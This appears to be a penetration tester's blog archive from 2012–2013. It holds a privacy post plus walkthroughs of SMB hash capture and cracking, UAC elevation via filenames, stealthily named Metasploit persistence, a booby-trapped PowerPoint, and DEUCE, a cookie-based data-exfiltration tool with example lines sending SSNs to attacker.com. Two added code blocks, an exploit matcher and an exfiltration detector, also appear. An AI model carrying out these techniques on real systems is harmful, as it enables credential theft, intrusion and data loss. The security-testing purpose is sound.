Tuesday, April 30, 2013

Your Neighborhood Online, Good or Bad Idea?


I ran across the site Nextdoor.com; it is another social media site, with one difference. “Nextdoor is the private social network for you, your neighbors and your community. It's the easiest way for you and your neighbors to talk online and make all of your lives better in the real world.” The idea is that only people in your real neighborhood can join. Out of curiosity I started looking around the demo site and began to think that this sounds like a terrible idea.

However, in my opinion this starts to go wrong very fast. A quick Google search for “site:nextdoor.com” already produces some interesting results. The first and second pages return results such as West Briar, Pointe Marin, Covie Hill and Bent Creek. Clicking these links takes you to a login page where you can get a little more information about the neighborhood, such as the city, state and an outlined map of the neighborhood.


Figure 1

Okay, so what’s the risk? First, the “bad guys” already know the city, state and neighborhood. Another quick Google search turns up an invite page where you enter your address, and thanks to the mini map and some more Googling it is easy to find an address within the outline.

Figure 2


The next step is an address verification page. The site requires either a credit card for checking the billing address, a mobile number they can call, or a postcard sent to you in the mail. I won’t get into the other worries that some of those options might cause; it looks like they are trying hard to protect the people using the site, but is that enough? And can it be easily circumvented?

What if someone simply gets into a valid account? (We don’t care how at this moment; it happens every day on many sites.) Could an attacker use any of the data or information to their advantage? The demo site shows us that there is a lot of information ripe for the picking.

The site is a standard social media site. You have maps, an inbox, events and a Neighbors button; the exception here is that the site really wants your physical data as well, and it becomes a data gatherer’s dream. Clicking on a user shows some useful information; obviously it is up to the user what to display. With the data in figure 3 an attacker could start looking to impersonate that person, or use the data to gain access to other accounts via password resets or challenge questions like “what is your dog’s name?” or “what is your oldest child’s name?”

Figure 3

As we go deeper into the site we start to see more information that could be valuable or even deadly. The personal risk you accept is huge; one of the best things about the internet is that, if you’re careful, someone finding you in the real world is a little bit challenging.

Figure 4


This example on the demo site shows a user asking for a babysitter from 4-10 pm, and other users posting phone numbers of great babysitters. This of course is incredibly helpful for the person needing the sitter. But what does it tell the bad guys? Mom or Dad won’t be home from 4-10, the name and number of the babysitter, and that the kids are older, most likely between the ages of 7-12. That information could be valuable to any person who wants to use it to their advantage. Did this home just become a possible target for a personal attack, a robbery, an angry boyfriend of the babysitter, or that creepy person down the street that nobody talks to?

It is your job to decide if this information is secure and okay to display to the public. No matter what privacy claims are made, assume someone you don’t want seeing this information will see it. Above all else protect your family and yourself, and maybe, just maybe, actually go outside and talk to your neighbors. Finally, another important item to consider when signing up for this type of site is: do they care about security? Looking at the current job postings, they are hiring a lot of developers, and none of the posted requirements mention “secure coding practices”. Hopefully that is asked during the interview process.

Thursday, February 28, 2013

Gather Sploits: Necessity is the mother of Invention


Ever run into a test where you port scan and you just cannot remember what those ports are, or whether there are any vulnerabilities connected to them? Normally I would just take the port and do a search on Exploit-db.com. However, I found myself doing that a lot on this last test; there were lots of weird ports. I started by writing a page scraper for Exploit-DB that took just a list of ports; it was a little slow. I added functionality to search the Exploit-DB CSV file that ships with BackTrack, or, if you have the file, you can just point the script at it. I quickly became annoyed with having to take the ports from my Nmap results, put them into a text file and then run my script. I then found out there is an API for Exploit-DB, so it was back to the drawing board, and at the end of the day the Gather Sploits script was born.

The script simply parses an Nmap XML file, grabs the host, ports and OS, and runs them through either the Exploit-DB online search or, if specified, a local copy. There are some requirements though: you will need a Shodan API key (instructions at http://docs.shodanhq.com/). You will also need the Shodan Python libraries, which you can get at https://github.com/achillean/shodan-python. Finally, you will need the code at the end of this article and Python 2.7.

If the Nmap XML includes operating system (OS) detection, the script limits the port findings to exploits for that OS along with exploits that target multiple OSes. You can also specify an OS or force all results. This script produces a lot of data; you have been warned.
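The Gather Sploits script itself is not reproduced on this page, so the following is an added example of the workflow it describes, written in Python 3 rather than the author's Python 2.7, and not the author's code. It parses an Nmap XML report, keeps only open ports and the best OS match, and filters a local exploit index the way the post describes: entries whose platform matches the detected OS, plus entries marked “multiple”, with switches to force all results or to override the OS. The Nmap XML and the exploit CSV are constructed sample data; the CSV column layout (id,file,description,date,author,platform,type,port) is an assumption about the historical Exploit-DB files.csv, and the online Exploit-DB/Shodan lookup the post mentions is not included.

```python
"""Cross-reference open ports from an Nmap XML report against a local exploit
index, following the Gather Sploits workflow described above.
Added example, not the author's script. The CSV layout
id,file,description,date,author,platform,type,port is an assumption about the
historical Exploit-DB files.csv; both inputs below are constructed sample data."""
import csv
import io
import xml.etree.ElementTree as ET

# Constructed Nmap XML (-oX style): one host, OS detection, two open ports, one filtered.
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
      <port protocol="tcp" portid="23"><state state="filtered"/><service name="telnet"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows 7 SP1" accuracy="97"/></os>
  </host>
</nmaprun>"""

# Constructed exploit index in the assumed Exploit-DB files.csv layout.
EXPLOIT_CSV = """id,file,description,date,author,platform,type,port
1001,platforms/windows/remote/1001.txt,Example SMB service bug,2010-01-01,anon,windows,remote,445
1002,platforms/linux/remote/1002.py,Example Samba bug,2011-01-01,anon,linux,remote,445
1003,platforms/multiple/remote/1003.rb,Example MySQL auth bypass,2012-06-09,anon,multiple,remote,3306
1004,platforms/linux/remote/1004.c,Example telnetd overflow,2011-12-25,anon,linux,remote,23
"""

# Substring of the Nmap osmatch name -> platform keyword used in the CSV.
OS_KEYWORDS = {"windows": "windows", "linux": "linux", "freebsd": "freebsd", "solaris": "solaris"}

def parse_nmap(xml_text):
    """Return [(ipv4_addr, os_family_or_None, [open port numbers]), ...]."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        ports = [int(p.get("portid")) for p in host.findall("ports/port")
                 if p.find("state") is not None and p.find("state").get("state") == "open"]
        os_family, best = None, None
        for match in host.findall("os/osmatch"):          # keep the highest-accuracy match
            accuracy = int(match.get("accuracy", "0"))
            if best is None or accuracy > best:
                best = accuracy
                name = match.get("name", "").lower()
                os_family = next((fam for kw, fam in OS_KEYWORDS.items() if kw in name), None)
        hosts.append((addr_el.get("addr"), os_family, ports))
    return hosts

def load_exploits(csv_text):
    """Rows of the index that carry a numeric port; everything else cannot be matched."""
    return [row for row in csv.DictReader(io.StringIO(csv_text)) if row.get("port", "").isdigit()]

def match_exploits(hosts, exploits, force_all=False, os_override=None):
    """Map each host address to sorted candidate exploit ids. Unless force_all, keep only
    entries whose platform is the host OS or 'multiple'; an unknown OS keeps every port match."""
    results = {}
    for addr, os_family, ports in hosts:
        family = os_override or os_family
        hits = []
        for row in exploits:
            if int(row["port"]) not in ports:
                continue
            platform = row["platform"].lower()
            if force_all or family is None or platform in (family, "multiple"):
                hits.append(row["id"])
        results[addr] = sorted(hits)
    return results

if __name__ == "__main__":
    hosts = parse_nmap(NMAP_XML)
    for addr, hits in match_exploits(hosts, load_exploits(EXPLOIT_CSV)).items():
        print(addr, hits)
```

Running the block prints one line per host with the matching exploit ids. A host without an osmatch keeps every port match, which is exactly why the post warns that the output gets large; the OS filter is what keeps it reviewable.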

Usage is simple


Results are plenty

Code below:

Wednesday, December 19, 2012

Refresher Series - Capturing and cracking SMB hashes with Cain and Half-LM rainbow tables.


First things first, what is an LM hash or LAN Manager hash? An LM hash is an outdated hashing function that is nonetheless still widely in use in corporate environments today. The most important features of an LM hash are as follows:

  • Passwords are a maximum of 14 characters, or 14 bytes.
  • Passwords are converted to uppercase.
  • Passwords are padded to 14 bytes.
  • The 14-byte password is split into two 7-byte halves. (This is the weakness exploited by the Half-LM attack.)
  • Read more about LM hashes at http://en.wikipedia.org/wiki/LM_hash

Simply put, if a user chooses a password of ‘Password’, the LM hashing function changes it into “PASSWOR” and “D”, and if they choose “PaSSwOrD12345!” it is changed to “PASSWOR” and “D12345!”. Obviously cracking two short passwords takes less time than cracking one long password.

Before you can use the Half-LM rainbow tables you either need to download them or generate them yourself, as I did, using Winrtgen, which is included with Cain. When using Winrtgen it is important to note the disk space and success probability. These are directly influenced by the charset and the number of tables. In the image below you see that the tables will only recover 97% of passwords using the alpha-numeric-symbol14 charset. You will also want to run the benchmark to see how long it will take you to generate the tables. On a side note, you can divide the tables.lst file to distribute the load, even among cores, as Winrtgen is not written for multicore support. Then we wait.


On to the fun stuff. To capture a hash we want to use the Metasploit SMB capture auxiliary module, located at auxiliary/server/capture/smb. Leave the default settings with the exception of CAINPWFILE; set this to the path where you want the Cain-format output file written.



Now you wait. You can do various things to coerce the victims to come to you, such as NetBIOS spoofing or embedding UNC paths, but that’s a topic for another day. When a user attempts to connect to the capture server you will see output similar to this. The important thing to note is that the capture contains an LM hash.


When you’re ready you can load the hashes into Cain by selecting the Cracker tab, then the plus symbol to add your hashes from a list.


Then select the hashes you want to crack, right click, and select Cryptanalysis attack, Half-LM hashes + challenge, via Rainbow tables.


Load your tables and let it run. The running time depends on the number of hashes.


When it is done you have a result similar to the image below. As you can see, we have not recovered the actual password yet, but we’re close. Let’s finish them off.


Follow a similar procedure to the one above by right clicking the hashes, but this time select brute-force attack and LM Hashes + Challenge. As you can see, I set the max length to 3; that’s because I assume that nobody picked a password over 10 characters, which is probably a pretty good assumption in this case. ;) Remember we already cracked 7 of the characters. As you can see, the second halves of the passwords are cracked extremely fast.


Cain then does a quick case brute force against the cracked password to determine its proper case; as you can see, the passwords were recovered.




That’s it! It is actually simpler in practice than it appears here. Good luck and have fun.

Tuesday, October 30, 2012

Getting System the Lazy Way


We know all too well that many users are local administrators. We also know we can send or drop binaries to these users and they will run whatever we want them to. The attack vector can be anything really: phishing, social engineering, flash drives, CD-ROMs or anything else you can imagine. The problem is that when they run the binary, if they don’t run it as admin we may not be able to get system level access. To be honest, that is the level I want and prefer to have. Take the following scenario:

We deliver our malicious binary disguised as an upgrade; the file is named ‘upgrade.exe’. The victim runs the upgrade and we get our shell. But it’s just a user shell. While I will take a user shell over no shell, I want system level access.


You may be able to get system a bunch of different ways in addition to the ‘getsystem’ command, such as the bypass UAC (user account control) module and some other nice post modules.

We can easily force a user to run a file as admin by simply altering the filename. If we change ‘upgrade.exe’ to ‘update.exe’, Windows automatically makes you run it as administrator, which you can tell by the UAC logo now on top of the executable.


If the user decides to run it now, we will be able to get system level access without much more effort, as seen below.


What’s interesting is that the filename can be many different things; it only has to contain the words, the format doesn’t matter. Meaning it could be local_update.exe or test-update. There are also other keywords such as:
  • install
  • instal
  • installer
  • setup
  • patch
  • update

I am sure there are others but I will leave it up to you to find them. The other interesting thing is that these keywords don’t have to exist in the file name; they can be in the details page of the file.



The only downside is that if the user is not an administrator this will prompt for administrator credentials, and that may result in you not getting any shell. But as I said in the beginning, many users already run as local admin.

Sunday, September 23, 2012

Metasploit Persistence

During penetration tests and red team versus blue team engagements you sometimes need your shells to always be available. Let’s say you pop a box and get your Meterpreter shell, which always happens right at the end of the day. You leave your shell, only to come back in the morning and find out the connection dropped because the system rebooted. Now you have to exploit all over again, or, worst case scenario, if you used a password to compromise the system and the person changed it, you’re stuck without a shell. That would be very sad. Luckily @Carlos_Perez/Darkoperator made a persistence script that is included in Metasploit. It’s awesome too: get your shell and run persistence.


Now, if there is an unexpected reboot you will get your shell back. To clean up the shell, all you need to do is run the multi_console_command script and point it at the cleanup file, which is given to you when you run the persistence command.

One thing I found lacking though was the use of random file names. While normally that is not an issue, I found that sometimes I needed to give the files a name, either so I could tell a point of contact ‘here is the registry key or service I created, WRPIQDAHVMHJ’, or because at times I felt that this string of random characters would look odd if you were trying not to get caught.

I took it upon myself to alter the built-in script to suit my needs. I added functionality to the persistence script to take a new parameter, ‘-N’, which allows you to specify a name for the service or registry key. If you don’t specify the switch it will just default to a random name. Now you can name it whatever you want. Give it a name like Microsoft-Active-Switch or something relevant to the company, and it will be harder to detect and easier to relay as information to a point of contact. I needed the option and I hope it can be useful to you as well.




While I have written in Python, I have never tried to alter a Ruby script before. This was my first attempt; here it is.




Wednesday, August 15, 2012

Attack with Power... Point that is.


There have been all kinds of document attacks, but what about PowerPoint? It turns out that PowerPoint makes it easy for an attacker to turn an innocent slideshow into a nasty little attack. The attack involves 4 simple steps: make a slideshow, make an action, rename the file and distribute it.

First things first, you need to make a slideshow. Design it any way you want, and pick the slide or slides you want to use the action on. Make a new text box and drag the box to cover the whole page. Click on Insert -> Actions -> Mouse Over. Then click the hyperlink button and select URL. Enter the desired URL, click OK and save the PowerPoint. In figure 1 I have entered a URL that is already set up for the Java Applet attack. This can be done with Metasploit or the Social-Engineer Toolkit.

Figure 1

If we were to send this to a target as is, it would only work once they started the slide show. To circumvent that we can rename the file from a PPT to a PPS (figures 2 and 3), which is a PowerPoint Slideshow. When the file is opened it starts as a full screen slide show. Since our attack is launched via a mouse over, when the user attempts to close the document the odds are they will trigger the attack.

Figure 2
Figure 3

At this point our malicious web page is opened, and the Java Applet attack commences, as seen below.




The user may not even be aware that they triggered the webpage to open; it might be beneficial to have the page appear to be a common webpage such as Gmail or Facebook. If the target decides to hit Run we would be given our shell and complete control of the system, as shown in figure 5.



Figure 5


I wanted to see if it was possible to embed a UNC path; it turns out it is just as simple. Follow the same steps as outlined above, but when you select URL enter a UNC path such as \\ipaddress\a.gif and set Metasploit to use the auxiliary/server/capture/smb module for capturing your requests. As you can see from figure 6, each time the mouse passes over the target area it sends the credentials. Now all you have to do is crack them.

Figure 6

These attacks are not new; the important part is that PowerPoint does not warn the user. There is no popup asking the user if they want to visit the site and, more importantly, there is absolutely no warning of the authentication attempt. The user may not even know that they have fallen victim to this attack.

This attack is very difficult to detect, as it simply uses the features of PowerPoint for a malicious purpose. If this type of attack originated from a trusted individual, spoofed or otherwise, or even a disgruntled employee, it could be absolutely devastating. My advice is simple: make sure you know the sender. There is nothing wrong with making a phone call and asking “Did you send me this PowerPoint?” Also, if you notice any odd behavior after opening a PowerPoint it may warrant further investigation.


Special thanks to my wife and @_Jagar_



Wednesday, July 18, 2012

DEUCE: Bypassing DLP with Cookies


At a recent B-Sides event there was a talk about the exfiltration of data and Data Loss Prevention (DLP) systems. A known vector to bypass DLP is the use of nslookup. The attacker requests a domain he controls but adds a hostname that contains the data that needs to be sent outside the controlled environment. This means that if an attacker wanted to steal a name and social security number he would request “johndoe123-45-1234.attacker.com”. This request would hit the DNS server and be logged, thus creating a list of identities for the attacker to mine at a later time. The maximum limit is 255 characters for this kind of attack. This concept got me thinking: what about a standard GET request such as http://attacker.com/johndoe123-45-1234? This would make life easier for the attacker. He would no longer need to control the DNS server; he would just need to see what pages were requested. We would still be limited by the character maximum, and each request could be easily logged and analyzed by proxies or alerting systems. But let’s be honest, most DLP systems are going to alert on these types of requests, or at least they should.

After some dialog with some friends, it was pointed out that using cookies would be a great alternative. Cookies aren’t normally logged by proxies or other systems. Also, if the cookie is encoded or encrypted, as they normally are, it keeps the DLP and prying eyes at bay. As an added benefit we are no longer limited by the 255 character maximum, and one request can send many cookies.

This led to the need to create a tool to test this concept. Enter Data Exfiltration Using Cookie Encryption, or DEUCE. DEUCE went from a simple concept to a multi-encoding and encryption DLP bypass tool. The program simply takes an input file and creates a cookie for each line. DEUCE has the ability to encrypt via AES, hash with MD5, or use a custom multi-encode with a 3-times replacement cipher. The program then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. MD5 is a one-way hash that would need to be cracked; however, if an attacker sent a list of social security numbers it would only take minutes to crack the 9-digit numbers using a tool like Hashcat. In the Python code you can change the name of the cookie; just make sure you change it in both the client and the server.



DEUCE is written in Python but could easily be converted to an executable using py2exe or PyInstaller; the AES encryption relies on PyCrypto. Because this is just a proof of concept tool, DEUCE does not currently support SSL, but it may in the future.

Using DEUCE is simple. By default the server listens on all interfaces on port 80. The DEUCE client has more options, such as encryption and encoding methods, target URL and input file. Example usage below:

  • python deuce_server.py -o output.txt
    • This starts the listening server on all interfaces on port 80 with the output written to output.txt
  • python deuce_client.py -u http://location_of_deuce_server -i inputfile.txt -m
    • This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server; the -m tells DEUCE to use multi-encode mode.
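The post observes that proxies rarely log cookies, so the defensive counterpart is to start recording them and look for Cookie headers that behave like DEUCE's output rather than like session state. The following is an added example, not part of DEUCE, that scores constructed proxy log lines on three signals the post itself implies: many cookies in one request (DEUCE emits one per input line), a large total cookie size (the channel has no 255 character cap), and cookie names the destination host has never been seen to set, with a high-entropy check on long values as a weaker hint. The log format, the sample lines, the hosts and the known-issuer table are all constructed for the example.

```python
"""Flag HTTP requests whose Cookie header looks like a data carrier rather than
session state, the exfiltration pattern DEUCE exercises. Added example for
defenders; it is not part of DEUCE. The proxy log format, sample lines and the
table of known cookie issuers are constructed for this example."""
import base64
import hashlib
import math
import re
from collections import Counter

# Constructed: one long high-entropy cookie value, deterministic so the sample is repeatable.
_BLOB = base64.b64encode(hashlib.sha256(b"constructed sample").digest() * 20).decode()

# Constructed log format: timestamp client host method path "Cookie: <header>"
LOG_LINES = [
    '2012-07-18T09:00:01 10.1.1.5 mail.example.com GET /inbox "Cookie: SID=3f9a1c7e2b; lang=en"',
    '2012-07-18T09:00:02 10.1.1.5 203.0.113.9 GET /index.html '
    '"Cookie: d0=QUVTOm5vcGU9; d1=Y0t6MTRzTHBv; d2=aGFzOnZvbHM=; d3=ZGF0YTpnb2Vz; d4=aGVyZTpsb2w=; d5=ZmluYWw6Y2h1"',
    '2012-07-18T09:00:03 10.1.1.6 www.example.org GET /img/logo.png "Cookie: "',
    f'2012-07-18T09:00:04 10.1.1.5 203.0.113.9 POST /index.html "Cookie: d0={_BLOB}"',
]

# Constructed: cookie names each host has been observed setting via Set-Cookie responses.
KNOWN_ISSUERS = {"mail.example.com": {"SID", "lang"}, "www.example.org": {"visitor"}}

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "Cookie: ?(.*)"$')

def shannon_entropy(text):
    """Bits per character of the text's own symbol distribution."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())

def parse_cookies(header):
    """Split a Cookie header into (name, value) pairs; a bare name gets an empty value."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if part:
            name, _, value = part.partition("=")
            pairs.append((name.strip(), value.strip()))
    return pairs

def analyze_request(line, known_issuers, max_cookies=5, max_bytes=512, entropy_floor=4.5):
    """Describe one request and list the reasons, if any, its cookies look like exfiltration."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, host, method, path, header = m.groups()
    cookies = parse_cookies(header)
    total = sum(len(v) for _, v in cookies)
    reasons = []
    if len(cookies) > max_cookies:
        reasons.append(f"{len(cookies)} cookies")           # one cookie per exfiltrated line
    if total > max_bytes:
        reasons.append(f"{total} cookie bytes")            # far beyond ordinary session state
    unknown = [n for n, _ in cookies if n not in known_issuers.get(host, set())]
    if unknown:
        reasons.append(f"names never set by {host}: {', '.join(unknown[:3])}")
    long_values = [v for _, v in cookies if len(v) >= 16]
    if long_values:
        mean_entropy = sum(shannon_entropy(v) for v in long_values) / len(long_values)
        if mean_entropy > entropy_floor:
            reasons.append(f"high-entropy values ({mean_entropy:.1f} bits/char)")
    return {"ts": ts, "client": client, "host": host, "method": method, "path": path,
            "cookies": len(cookies), "bytes": total, "reasons": reasons}

def analyze_log(lines, known_issuers):
    """Analyze every parseable line, preserving order."""
    return [r for r in (analyze_request(line, known_issuers) for line in lines) if r is not None]

if __name__ == "__main__":
    for r in analyze_log(LOG_LINES, KNOWN_ISSUERS):
        status = "FLAG" if r["reasons"] else "ok  "
        print(status, r["ts"], r["client"], "->", r["host"], "; ".join(r["reasons"]))
```

Entropy alone is a poor signal, since legitimate session tokens are also high-entropy and the post's multi-encode mode exists precisely to look like them; the strongest of the three signals is the issuer check, which only works if Set-Cookie responses are recorded alongside requests, which is the logging gap the post relies on.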

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there. It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means.

Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake Garlie (@_Jagar_) for listening to me rant about this.

Deuce_Server



Deuce_Client